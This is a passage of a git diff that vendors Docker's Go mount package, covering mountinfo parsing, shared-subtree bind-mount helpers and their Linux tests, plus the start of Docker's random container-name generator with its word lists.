rw,relatime - aufs none rw,si=9b4a76444445839c +67 15 0:3588 / /var/lib/docker/aufs/mnt/cde8c40f6524b7361af4f5ad05bb857dc9ee247c20852ba666195c0739e3a2b8 rw,relatime - aufs none rw,si=9b4a7644badd339c +265 15 0:3610 / /var/lib/docker/aufs/mnt/e812472cd2c8c4748d1ef71fac4e77e50d661b9349abe66ce3e23511ed44f414 rw,relatime - aufs none rw,si=9b4a76427937d39c +270 15 0:3615 / /var/lib/docker/aufs/mnt/997636e7c5c9d0d1376a217e295c14c205350b62bc12052804fb5f90abe6f183 rw,relatime - aufs none rw,si=9b4a76406540739c +273 15 0:3618 / /var/lib/docker/aufs/mnt/d5794d080417b6e52e69227c3873e0e4c1ff0d5a845ebe3860ec2f89a47a2a1e rw,relatime - aufs none rw,si=9b4a76454814039c +278 15 0:3623 / /var/lib/docker/aufs/mnt/586bdd48baced671bb19bc4d294ec325f26c55545ae267db426424f157d59c48 rw,relatime - aufs none rw,si=9b4a7644b439f39c +281 15 0:3626 / /var/lib/docker/aufs/mnt/69739d022f89f8586908bbd5edbbdd95ea5256356f177f9ffcc6ef9c0ea752d2 rw,relatime - aufs none rw,si=9b4a7644a0f1b39c +286 15 0:3631 / /var/lib/docker/aufs/mnt/ff28c27d5f894363993622de26d5dd352dba072f219e4691d6498c19bbbc15a9 rw,relatime - aufs none rw,si=9b4a7642265b339c +289 15 
0:3634 / /var/lib/docker/aufs/mnt/aa128fe0e64fdede333aa48fd9de39530c91a9244a0f0649a3c411c61e372daa rw,relatime - aufs none rw,si=9b4a764012ada39c +99 15 8:33 / /media/REMOVE\040ME rw,nosuid,nodev,relatime - fuseblk /dev/sdc1 rw,user_id=0,group_id=0,allow_other,blksize=4096` +) + +func TestParseFedoraMountinfo(t *testing.T) { + r := bytes.NewBuffer([]byte(fedoraMountinfo)) + _, err := parseInfoFile(r) + if err != nil { + t.Fatal(err) + } +} + +func TestParseUbuntuMountinfo(t *testing.T) { + r := bytes.NewBuffer([]byte(ubuntuMountInfo)) + _, err := parseInfoFile(r) + if err != nil { + t.Fatal(err) + } +} + +func TestParseGentooMountinfo(t *testing.T) { + r := bytes.NewBuffer([]byte(gentooMountinfo)) + _, err := parseInfoFile(r) + if err != nil { + t.Fatal(err) + } +} + +func TestParseFedoraMountinfoFields(t *testing.T) { + r := bytes.NewBuffer([]byte(fedoraMountinfo)) + infos, err := parseInfoFile(r) + if err != nil { + t.Fatal(err) + } + expectedLength := 58 + if len(infos) != expectedLength { + t.Fatalf("Expected %d entries, got %d", expectedLength, len(infos)) + } + mi := Info{ + ID: 15, + Parent: 35, + Major: 0, + Minor: 3, + Root: "/", + Mountpoint: "/proc", + Opts: "rw,nosuid,nodev,noexec,relatime", + Optional: "shared:5", + Fstype: "proc", + Source: "proc", + VfsOpts: "rw", + } + + if *infos[0] != mi { + t.Fatalf("expected %#v, got %#v", mi, infos[0]) + } +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go new file mode 100644 index 0000000000..ad9ab57f8b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go @@ -0,0 +1,37 @@ +// +build solaris,cgo + +package mount + +/* +#include +#include +*/ +import "C" + +import ( + "fmt" +) + +func parseMountTable() ([]*Info, error) { + mnttab := C.fopen(C.CString(C.MNTTAB), C.CString("r")) + if mnttab == nil { + return nil, fmt.Errorf("Failed to open %s", C.MNTTAB) + } + + var out []*Info + var mp 
C.struct_mnttab + + ret := C.getmntent(mnttab, &mp) + for ret == 0 { + var mountinfo Info + mountinfo.Mountpoint = C.GoString(mp.mnt_mountp) + mountinfo.Source = C.GoString(mp.mnt_special) + mountinfo.Fstype = C.GoString(mp.mnt_fstype) + mountinfo.Opts = C.GoString(mp.mnt_mntopts) + out = append(out, &mountinfo) + ret = C.getmntent(mnttab, &mp) + } + + C.fclose(mnttab) + return out, nil +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go new file mode 100644 index 0000000000..7fbcf19214 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go @@ -0,0 +1,12 @@ +// +build !windows,!linux,!freebsd,!solaris freebsd,!cgo solaris,!cgo + +package mount + +import ( + "fmt" + "runtime" +) + +func parseMountTable() ([]*Info, error) { + return nil, fmt.Errorf("mount.parseMountTable is not implemented on %s/%s", runtime.GOOS, runtime.GOARCH) +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go new file mode 100644 index 0000000000..dab8a37ed0 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go @@ -0,0 +1,6 @@ +package mount + +func parseMountTable() ([]*Info, error) { + // Do NOT return an error! + return nil, nil +} diff --git a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go new file mode 100644 index 0000000000..8ceec84bc6 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go @@ -0,0 +1,69 @@ +// +build linux + +package mount + +// MakeShared ensures a mounted filesystem has the SHARED mount option enabled. +// See the supported options in flags.go for further reference. 
+func MakeShared(mountPoint string) error { + return ensureMountedAs(mountPoint, "shared") +} + +// MakeRShared ensures a mounted filesystem has the RSHARED mount option enabled. +// See the supported options in flags.go for further reference. +func MakeRShared(mountPoint string) error { + return ensureMountedAs(mountPoint, "rshared") +} + +// MakePrivate ensures a mounted filesystem has the PRIVATE mount option enabled. +// See the supported options in flags.go for further reference. +func MakePrivate(mountPoint string) error { + return ensureMountedAs(mountPoint, "private") +} + +// MakeRPrivate ensures a mounted filesystem has the RPRIVATE mount option +// enabled. See the supported options in flags.go for further reference. +func MakeRPrivate(mountPoint string) error { + return ensureMountedAs(mountPoint, "rprivate") +} + +// MakeSlave ensures a mounted filesystem has the SLAVE mount option enabled. +// See the supported options in flags.go for further reference. +func MakeSlave(mountPoint string) error { + return ensureMountedAs(mountPoint, "slave") +} + +// MakeRSlave ensures a mounted filesystem has the RSLAVE mount option enabled. +// See the supported options in flags.go for further reference. +func MakeRSlave(mountPoint string) error { + return ensureMountedAs(mountPoint, "rslave") +} + +// MakeUnbindable ensures a mounted filesystem has the UNBINDABLE mount option +// enabled. See the supported options in flags.go for further reference. +func MakeUnbindable(mountPoint string) error { + return ensureMountedAs(mountPoint, "unbindable") +} + +// MakeRUnbindable ensures a mounted filesystem has the RUNBINDABLE mount +// option enabled. See the supported options in flags.go for further reference. 
+func MakeRUnbindable(mountPoint string) error { + return ensureMountedAs(mountPoint, "runbindable") +} + +func ensureMountedAs(mountPoint, options string) error { + mounted, err := Mounted(mountPoint) + if err != nil { + return err + } + + if !mounted { + if err := Mount(mountPoint, mountPoint, "none", "bind,rw"); err != nil { + return err + } + } + if _, err = Mounted(mountPoint); err != nil { + return err + } + + return ForceMount("", mountPoint, "none", options) +} diff --git a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go new file mode 100644 index 0000000000..c1837942e3 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go @@ -0,0 +1,331 @@ +// +build linux + +package mount + +import ( + "os" + "path" + "syscall" + "testing" +) + +// nothing is propagated in or out +func TestSubtreePrivate(t *testing.T) { + tmp := path.Join(os.TempDir(), "mount-tests") + if err := os.MkdirAll(tmp, 0777); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + + var ( + sourceDir = path.Join(tmp, "source") + targetDir = path.Join(tmp, "target") + outside1Dir = path.Join(tmp, "outside1") + outside2Dir = path.Join(tmp, "outside2") + + outside1Path = path.Join(outside1Dir, "file.txt") + outside2Path = path.Join(outside2Dir, "file.txt") + outside1CheckPath = path.Join(targetDir, "a", "file.txt") + outside2CheckPath = path.Join(sourceDir, "b", "file.txt") + ) + if err := os.MkdirAll(path.Join(sourceDir, "a"), 0777); err != nil { + t.Fatal(err) + } + if err := os.MkdirAll(path.Join(sourceDir, "b"), 0777); err != nil { + t.Fatal(err) + } + if err := os.Mkdir(targetDir, 0777); err != nil { + t.Fatal(err) + } + if err := os.Mkdir(outside1Dir, 0777); err != nil { + t.Fatal(err) + } + if err := os.Mkdir(outside2Dir, 0777); err != nil { + t.Fatal(err) + } + + if err := createFile(outside1Path); err != nil { + t.Fatal(err) + } + if err := 
createFile(outside2Path); err != nil { + t.Fatal(err) + } + + // mount the shared directory to a target + if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(targetDir); err != nil { + t.Fatal(err) + } + }() + + // next, make the target private + if err := MakePrivate(targetDir); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(targetDir); err != nil { + t.Fatal(err) + } + }() + + // mount in an outside path to a mounted path inside the _source_ + if err := Mount(outside1Dir, path.Join(sourceDir, "a"), "none", "bind,rw"); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(path.Join(sourceDir, "a")); err != nil { + t.Fatal(err) + } + }() + + // check that this file _does_not_ show in the _target_ + if _, err := os.Stat(outside1CheckPath); err != nil && !os.IsNotExist(err) { + t.Fatal(err) + } else if err == nil { + t.Fatalf("%q should not be visible, but is", outside1CheckPath) + } + + // next mount outside2Dir into the _target_ + if err := Mount(outside2Dir, path.Join(targetDir, "b"), "none", "bind,rw"); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(path.Join(targetDir, "b")); err != nil { + t.Fatal(err) + } + }() + + // check that this file _does_not_ show in the _source_ + if _, err := os.Stat(outside2CheckPath); err != nil && !os.IsNotExist(err) { + t.Fatal(err) + } else if err == nil { + t.Fatalf("%q should not be visible, but is", outside2CheckPath) + } +} + +// Testing that when a target is a shared mount, +// then child mounts propagate to the source +func TestSubtreeShared(t *testing.T) { + tmp := path.Join(os.TempDir(), "mount-tests") + if err := os.MkdirAll(tmp, 0777); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + + var ( + sourceDir = path.Join(tmp, "source") + targetDir = path.Join(tmp, "target") + outsideDir = path.Join(tmp, "outside") + + outsidePath = path.Join(outsideDir, "file.txt") + sourceCheckPath 
= path.Join(sourceDir, "a", "file.txt") + ) + + if err := os.MkdirAll(path.Join(sourceDir, "a"), 0777); err != nil { + t.Fatal(err) + } + if err := os.Mkdir(targetDir, 0777); err != nil { + t.Fatal(err) + } + if err := os.Mkdir(outsideDir, 0777); err != nil { + t.Fatal(err) + } + + if err := createFile(outsidePath); err != nil { + t.Fatal(err) + } + + // mount the source as shared + if err := MakeShared(sourceDir); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(sourceDir); err != nil { + t.Fatal(err) + } + }() + + // mount the shared directory to a target + if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(targetDir); err != nil { + t.Fatal(err) + } + }() + + // mount in an outside path to a mounted path inside the target + if err := Mount(outsideDir, path.Join(targetDir, "a"), "none", "bind,rw"); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(path.Join(targetDir, "a")); err != nil { + t.Fatal(err) + } + }() + + // NOW, check that the file from the outside directory is available in the source directory + if _, err := os.Stat(sourceCheckPath); err != nil { + t.Fatal(err) + } +} + +// testing that mounts to a shared source show up in the slave target, +// and that mounts into a slave target do _not_ show up in the shared source +func TestSubtreeSharedSlave(t *testing.T) { + tmp := path.Join(os.TempDir(), "mount-tests") + if err := os.MkdirAll(tmp, 0777); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + + var ( + sourceDir = path.Join(tmp, "source") + targetDir = path.Join(tmp, "target") + outside1Dir = path.Join(tmp, "outside1") + outside2Dir = path.Join(tmp, "outside2") + + outside1Path = path.Join(outside1Dir, "file.txt") + outside2Path = path.Join(outside2Dir, "file.txt") + outside1CheckPath = path.Join(targetDir, "a", "file.txt") + outside2CheckPath = path.Join(sourceDir, "b", "file.txt") + ) + if err := 
os.MkdirAll(path.Join(sourceDir, "a"), 0777); err != nil { + t.Fatal(err) + } + if err := os.MkdirAll(path.Join(sourceDir, "b"), 0777); err != nil { + t.Fatal(err) + } + if err := os.Mkdir(targetDir, 0777); err != nil { + t.Fatal(err) + } + if err := os.Mkdir(outside1Dir, 0777); err != nil { + t.Fatal(err) + } + if err := os.Mkdir(outside2Dir, 0777); err != nil { + t.Fatal(err) + } + + if err := createFile(outside1Path); err != nil { + t.Fatal(err) + } + if err := createFile(outside2Path); err != nil { + t.Fatal(err) + } + + // mount the source as shared + if err := MakeShared(sourceDir); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(sourceDir); err != nil { + t.Fatal(err) + } + }() + + // mount the shared directory to a target + if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(targetDir); err != nil { + t.Fatal(err) + } + }() + + // next, make the target slave + if err := MakeSlave(targetDir); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(targetDir); err != nil { + t.Fatal(err) + } + }() + + // mount in an outside path to a mounted path inside the _source_ + if err := Mount(outside1Dir, path.Join(sourceDir, "a"), "none", "bind,rw"); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(path.Join(sourceDir, "a")); err != nil { + t.Fatal(err) + } + }() + + // check that this file _does_ show in the _target_ + if _, err := os.Stat(outside1CheckPath); err != nil { + t.Fatal(err) + } + + // next mount outside2Dir into the _target_ + if err := Mount(outside2Dir, path.Join(targetDir, "b"), "none", "bind,rw"); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(path.Join(targetDir, "b")); err != nil { + t.Fatal(err) + } + }() + + // check that this file _does_not_ show in the _source_ + if _, err := os.Stat(outside2CheckPath); err != nil && !os.IsNotExist(err) { + t.Fatal(err) + } else if err == nil { + t.Fatalf("%q 
should not be visible, but is", outside2CheckPath) + } +} + +func TestSubtreeUnbindable(t *testing.T) { + tmp := path.Join(os.TempDir(), "mount-tests") + if err := os.MkdirAll(tmp, 0777); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + + var ( + sourceDir = path.Join(tmp, "source") + targetDir = path.Join(tmp, "target") + ) + if err := os.MkdirAll(sourceDir, 0777); err != nil { + t.Fatal(err) + } + if err := os.MkdirAll(targetDir, 0777); err != nil { + t.Fatal(err) + } + + // next, make the source unbindable + if err := MakeUnbindable(sourceDir); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(sourceDir); err != nil { + t.Fatal(err) + } + }() + + // then attempt to mount it to target. It should fail + if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil && err != syscall.EINVAL { + t.Fatal(err) + } else if err == nil { + t.Fatalf("%q should not have been bindable", sourceDir) + } + defer func() { + if err := Unmount(targetDir); err != nil { + t.Fatal(err) + } + }() +} + +func createFile(path string) error { + f, err := os.Create(path) + if err != nil { + return err + } + f.WriteString("hello world!") + return f.Close() +} diff --git a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go new file mode 100644 index 0000000000..09f6b03cbc --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go @@ -0,0 +1,58 @@ +// +build solaris + +package mount + +// MakeShared ensures a mounted filesystem has the SHARED mount option enabled. +// See the supported options in flags.go for further reference. +func MakeShared(mountPoint string) error { + return ensureMountedAs(mountPoint, "shared") +} + +// MakeRShared ensures a mounted filesystem has the RSHARED mount option enabled. +// See the supported options in flags.go for further reference. 
+func MakeRShared(mountPoint string) error { + return ensureMountedAs(mountPoint, "rshared") +} + +// MakePrivate ensures a mounted filesystem has the PRIVATE mount option enabled. +// See the supported options in flags.go for further reference. +func MakePrivate(mountPoint string) error { + return ensureMountedAs(mountPoint, "private") +} + +// MakeRPrivate ensures a mounted filesystem has the RPRIVATE mount option +// enabled. See the supported options in flags.go for further reference. +func MakeRPrivate(mountPoint string) error { + return ensureMountedAs(mountPoint, "rprivate") +} + +// MakeSlave ensures a mounted filesystem has the SLAVE mount option enabled. +// See the supported options in flags.go for further reference. +func MakeSlave(mountPoint string) error { + return ensureMountedAs(mountPoint, "slave") +} + +// MakeRSlave ensures a mounted filesystem has the RSLAVE mount option enabled. +// See the supported options in flags.go for further reference. +func MakeRSlave(mountPoint string) error { + return ensureMountedAs(mountPoint, "rslave") +} + +// MakeUnbindable ensures a mounted filesystem has the UNBINDABLE mount option +// enabled. See the supported options in flags.go for further reference. +func MakeUnbindable(mountPoint string) error { + return ensureMountedAs(mountPoint, "unbindable") +} + +// MakeRUnbindable ensures a mounted filesystem has the RUNBINDABLE mount +// option enabled. See the supported options in flags.go for further reference. +func MakeRUnbindable(mountPoint string) error { + return ensureMountedAs(mountPoint, "runbindable") +} + +func ensureMountedAs(mountPoint, options string) error { + // TODO: Solaris does not support bind mounts. + // Evaluate lofs and also look at the relevant + // mount flags to be supported. 
+ return nil +} diff --git a/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go b/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go new file mode 100644 index 0000000000..18a939b70b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go @@ -0,0 +1,11 @@ +package main + +import ( + "fmt" + + "github.com/docker/docker/pkg/namesgenerator" +) + +func main() { + fmt.Println(namesgenerator.GetRandomName(0)) +} diff --git a/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go new file mode 100644 index 0000000000..cfb8157d69 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go @@ -0,0 +1,590 @@ +package namesgenerator + +import ( + "fmt" + + "github.com/docker/docker/pkg/random" +) + +var ( + left = [...]string{ + "admiring", + "adoring", + "affectionate", + "agitated", + "amazing", + "angry", + "awesome", + "blissful", + "boring", + "brave", + "clever", + "cocky", + "compassionate", + "competent", + "condescending", + "confident", + "cranky", + "dazzling", + "determined", + "distracted", + "dreamy", + "eager", + "ecstatic", + "elastic", + "elated", + "elegant", + "eloquent", + "epic", + "fervent", + "festive", + "flamboyant", + "focused", + "friendly", + "frosty", + "gallant", + "gifted", + "goofy", + "gracious", + "happy", + "hardcore", + "heuristic", + "hopeful", + "hungry", + "infallible", + "inspiring", + "jolly", + "jovial", + "keen", + "kickass", + "kind", + "laughing", + "loving", + "lucid", + "mystifying", + "modest", + "musing", + "naughty", + "nervous", + "nifty", + "nostalgic", + "objective", + "optimistic", + "peaceful", + "pedantic", + "pensive", + "practical", + "priceless", + "quirky", + "quizzical", + "relaxed", + "reverent", + "romantic", + "sad", + "serene", + "sharp", + "silly", + "sleepy", + "stoic", + "stupefied", + 
"suspicious", + "tender", + "thirsty", + "trusting", + "unruffled", + "upbeat", + "vibrant", + "vigilant", + "wizardly", + "wonderful", + "xenodochial", + "youthful", + "zealous", + "zen", + } + + // Docker, starting from 0.7.x, generates names from notable scientists and hackers. + // Please, for any amazing man that you add to the list, consider adding an equally amazing woman to it, and vice versa. + right = [...]string{ + // Muhammad ibn Jābir al-Ḥarrānī al-Battānī was a founding father of astronomy. https://en.wikipedia.org/wiki/Mu%E1%B8%A5ammad_ibn_J%C4%81bir_al-%E1%B8%A4arr%C4%81n%C4%AB_al-Batt%C4%81n%C4%AB + "albattani", + + // Frances E. Allen, became the first female IBM Fellow in 1989. In 2006, she became the first female recipient of the ACM's Turing Award. https://en.wikipedia.org/wiki/Frances_E._Allen + "allen", + + // June Almeida - Scottish virologist who took the first pictures of the rubella virus - https://en.wikipedia.org/wiki/June_Almeida + "almeida", + + // Maria Gaetana Agnesi - Italian mathematician, philosopher, theologian and humanitarian. She was the first woman to write a mathematics handbook and the first woman appointed as a Mathematics Professor at a University. https://en.wikipedia.org/wiki/Maria_Gaetana_Agnesi + "agnesi", + + // Archimedes was a physicist, engineer and mathematician who invented too many things to list them here. https://en.wikipedia.org/wiki/Archimedes + "archimedes", + + // Maria Ardinghelli - Italian translator, mathematician and physicist - https://en.wikipedia.org/wiki/Maria_Ardinghelli + "ardinghelli", + + // Aryabhata - Ancient Indian mathematician-astronomer during 476-550 CE https://en.wikipedia.org/wiki/Aryabhata + "aryabhata", + + // Wanda Austin - Wanda Austin is the President and CEO of The Aerospace Corporation, a leading architect for the US security space programs. https://en.wikipedia.org/wiki/Wanda_Austin + "austin", + + // Charles Babbage invented the concept of a programmable computer. 
https://en.wikipedia.org/wiki/Charles_Babbage. + "babbage", + + // Stefan Banach - Polish mathematician, was one of the founders of modern functional analysis. https://en.wikipedia.org/wiki/Stefan_Banach + "banach", + + // John Bardeen co-invented the transistor - https://en.wikipedia.org/wiki/John_Bardeen + "bardeen", + + // Jean Bartik, born Betty Jean Jennings, was one of the original programmers for the ENIAC computer. https://en.wikipedia.org/wiki/Jean_Bartik + "bartik", + + // Laura Bassi, the world's first female professor https://en.wikipedia.org/wiki/Laura_Bassi + "bassi", + + // Hugh Beaver, British engineer, founder of the Guinness Book of World Records https://en.wikipedia.org/wiki/Hugh_Beaver + "beaver", + + // Alexander Graham Bell - an eminent Scottish-born scientist, inventor, engineer and innovator who is credited with inventing the first practical telephone - https://en.wikipedia.org/wiki/Alexander_Graham_Bell + "bell", + + // Homi J Bhabha - was an Indian nuclear physicist, founding director, and professor of physics at the Tata Institute of Fundamental Research. Colloquially known as "father of Indian nuclear programme"- https://en.wikipedia.org/wiki/Homi_J._Bhabha + "bhabha", + + // Bhaskara II - Ancient Indian mathematician-astronomer whose work on calculus predates Newton and Leibniz by over half a millennium - https://en.wikipedia.org/wiki/Bh%C4%81skara_II#Calculus + "bhaskara", + + // Elizabeth Blackwell - American doctor and first American woman to receive a medical degree - https://en.wikipedia.org/wiki/Elizabeth_Blackwell + "blackwell", + + // Niels Bohr is the father of quantum theory. https://en.wikipedia.org/wiki/Niels_Bohr. + "bohr", + + // Kathleen Booth, she's credited with writing the first assembly language. https://en.wikipedia.org/wiki/Kathleen_Booth + "booth", + + // Anita Borg - Anita Borg was the founding director of the Institute for Women and Technology (IWT). 
https://en.wikipedia.org/wiki/Anita_Borg + "borg", + + // Satyendra Nath Bose - He provided the foundation for Bose–Einstein statistics and the theory of the Bose–Einstein condensate. - https://en.wikipedia.org/wiki/Satyendra_Nath_Bose + "bose", + + // Evelyn Boyd Granville - She was one of the first African-American woman to receive a Ph.D. in mathematics; she earned it in 1949 from Yale University. https://en.wikipedia.org/wiki/Evelyn_Boyd_Granville + "boyd", + + // Brahmagupta - Ancient Indian mathematician during 598-670 CE who gave rules to compute with zero - https://en.wikipedia.org/wiki/Brahmagupta#Zero + "brahmagupta", + + // Walter Houser Brattain co-invented the transistor - https://en.wikipedia.org/wiki/Walter_Houser_Brattain + "brattain", + + // Emmett Brown invented time travel. https://en.wikipedia.org/wiki/Emmett_Brown (thanks Brian Goff) + "brown", + + // Rachel Carson - American marine biologist and conservationist, her book Silent Spring and other writings are credited with advancing the global environmental movement. https://en.wikipedia.org/wiki/Rachel_Carson + "carson", + + // Subrahmanyan Chandrasekhar - Astrophysicist known for his mathematical theory on different stages and evolution in structures of the stars. He has won nobel prize for physics - https://en.wikipedia.org/wiki/Subrahmanyan_Chandrasekhar + "chandrasekhar", + + //Claude Shannon - The father of information theory and founder of digital circuit design theory. (https://en.wikipedia.org/wiki/Claude_Shannon) + "shannon", + + // Joan Clarke - Bletchley Park code breaker during the Second World War who pioneered techniques that remained top secret for decades. 
Also an accomplished numismatist https://en.wikipedia.org/wiki/Joan_Clarke + "clarke", + + // Jane Colden - American botanist widely considered the first female American botanist - https://en.wikipedia.org/wiki/Jane_Colden + "colden", + + // Gerty Theresa Cori - American biochemist who became the third woman—and first American woman—to win a Nobel Prize in science, and the first woman to be awarded the Nobel Prize in Physiology or Medicine. Cori was born in Prague. https://en.wikipedia.org/wiki/Gerty_Cori + "cori", + + // Seymour Roger Cray was an American electrical engineer and supercomputer architect who designed a series of computers that were the fastest in the world for decades. https://en.wikipedia.org/wiki/Seymour_Cray + "cray", + + // This entry reflects a husband and wife team who worked together: + // Joan Curran was a Welsh scientist who developed radar and invented chaff, a radar countermeasure. https://en.wikipedia.org/wiki/Joan_Curran + // Samuel Curran was an Irish physicist who worked alongside his wife during WWII and invented the proximity fuse. https://en.wikipedia.org/wiki/Samuel_Curran + "curran", + + // Marie Curie discovered radioactivity. https://en.wikipedia.org/wiki/Marie_Curie. + "curie", + + // Charles Darwin established the principles of natural evolution. https://en.wikipedia.org/wiki/Charles_Darwin. + "darwin", + + // Leonardo Da Vinci invented too many things to list here. https://en.wikipedia.org/wiki/Leonardo_da_Vinci. + "davinci", + + // Edsger Wybe Dijkstra was a Dutch computer scientist and mathematical scientist. https://en.wikipedia.org/wiki/Edsger_W._Dijkstra. + "dijkstra", + + // Donna Dubinsky - played an integral role in the development of personal digital assistants (PDAs) serving as CEO of Palm, Inc. and co-founding Handspring. 
https://en.wikipedia.org/wiki/Donna_Dubinsky + "dubinsky", + + // Annie Easley - She was a leading member of the team which developed software for the Centaur rocket stage and one of the first African-Americans in her field. https://en.wikipedia.org/wiki/Annie_Easley + "easley", + + // Thomas Alva Edison, prolific inventor https://en.wikipedia.org/wiki/Thomas_Edison + "edison", + + // Albert Einstein invented the general theory of relativity. https://en.wikipedia.org/wiki/Albert_Einstein + "einstein", + + // Gertrude Elion - American biochemist, pharmacologist and the 1988 recipient of the Nobel Prize in Medicine - https://en.wikipedia.org/wiki/Gertrude_Elion + "elion", + + // Douglas Engelbart gave the mother of all demos: https://en.wikipedia.org/wiki/Douglas_Engelbart + "engelbart", + + // Euclid invented geometry. https://en.wikipedia.org/wiki/Euclid + "euclid", + + // Leonhard Euler invented large parts of modern mathematics. https://de.wikipedia.org/wiki/Leonhard_Euler + "euler", + + // Pierre de Fermat pioneered several aspects of modern mathematics. https://en.wikipedia.org/wiki/Pierre_de_Fermat + "fermat", + + // Enrico Fermi invented the first nuclear reactor. https://en.wikipedia.org/wiki/Enrico_Fermi. + "fermi", + + // Richard Feynman was a key contributor to quantum mechanics and particle physics. https://en.wikipedia.org/wiki/Richard_Feynman + "feynman", + + // Benjamin Franklin is famous for his experiments in electricity and the invention of the lightning rod. + "franklin", + + // Galileo was a founding father of modern astronomy, and faced politics and obscurantism to establish scientific truth. https://en.wikipedia.org/wiki/Galileo_Galilei + "galileo", + + // William Henry "Bill" Gates III is an American business magnate, philanthropist, investor, computer programmer, and inventor. https://en.wikipedia.org/wiki/Bill_Gates + "gates", + + // Adele Goldberg, was one of the designers and developers of the Smalltalk language. 
https://en.wikipedia.org/wiki/Adele_Goldberg_(computer_scientist) + "goldberg", + + // Adele Goldstine, born Adele Katz, wrote the complete technical description for the first electronic digital computer, ENIAC. https://en.wikipedia.org/wiki/Adele_Goldstine + "goldstine", + + // Shafi Goldwasser is a computer scientist known for creating theoretical foundations of modern cryptography. Winner of 2012 ACM Turing Award. https://en.wikipedia.org/wiki/Shafi_Goldwasser + "goldwasser", + + // James Golick, all around gangster. + "golick", + + // Jane Goodall - British primatologist, ethologist, and anthropologist who is considered to be the world's foremost expert on chimpanzees - https://en.wikipedia.org/wiki/Jane_Goodall + "goodall", + + // Lois Haibt - American computer scientist, part of the team at IBM that developed FORTRAN - https://en.wikipedia.org/wiki/Lois_Haibt + "haibt", + + // Margaret Hamilton - Director of the Software Engineering Division of the MIT Instrumentation Laboratory, which developed on-board flight software for the Apollo space program. https://en.wikipedia.org/wiki/Margaret_Hamilton_(scientist) + "hamilton", + + // Stephen Hawking pioneered the field of cosmology by combining general relativity and quantum mechanics. https://en.wikipedia.org/wiki/Stephen_Hawking + "hawking", + + // Werner Heisenberg was a founding father of quantum mechanics. https://en.wikipedia.org/wiki/Werner_Heisenberg + "heisenberg", + + // Jaroslav Heyrovský was the inventor of the polarographic method, father of the electroanalytical method, and recipient of the Nobel Prize in 1959. His main field of work was polarography. https://en.wikipedia.org/wiki/Jaroslav_Heyrovsk%C3%BD + "heyrovsky", + + // Dorothy Hodgkin was a British biochemist, credited with the development of protein crystallography. She was awarded the Nobel Prize in Chemistry in 1964. 
https://en.wikipedia.org/wiki/Dorothy_Hodgkin + "hodgkin", + + // Erna Schneider Hoover revolutionized modern communication by inventing a computerized telephone switching method. https://en.wikipedia.org/wiki/Erna_Schneider_Hoover + "hoover", + + // Grace Hopper developed the first compiler for a computer programming language and is credited with popularizing the term "debugging" for fixing computer glitches. https://en.wikipedia.org/wiki/Grace_Hopper + "hopper", + + // Frances Hugle, she was an American scientist, engineer, and inventor who contributed to the understanding of semiconductors, integrated circuitry, and the unique electrical principles of microscopic materials. https://en.wikipedia.org/wiki/Frances_Hugle + "hugle", + + // Hypatia - Greek Alexandrine Neoplatonist philosopher in Egypt who was one of the earliest mothers of mathematics - https://en.wikipedia.org/wiki/Hypatia + "hypatia", + + // Yeong-Sil Jang was a Korean scientist and astronomer during the Joseon Dynasty; he invented the first metal printing press and water gauge. https://en.wikipedia.org/wiki/Jang_Yeong-sil + "jang", + + // Betty Jennings - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Jean_Bartik + "jennings", + + // Mary Lou Jepsen, was the founder and chief technology officer of One Laptop Per Child (OLPC), and the founder of Pixel Qi. https://en.wikipedia.org/wiki/Mary_Lou_Jepsen + "jepsen", + + // Irène Joliot-Curie - French scientist who was awarded the Nobel Prize for 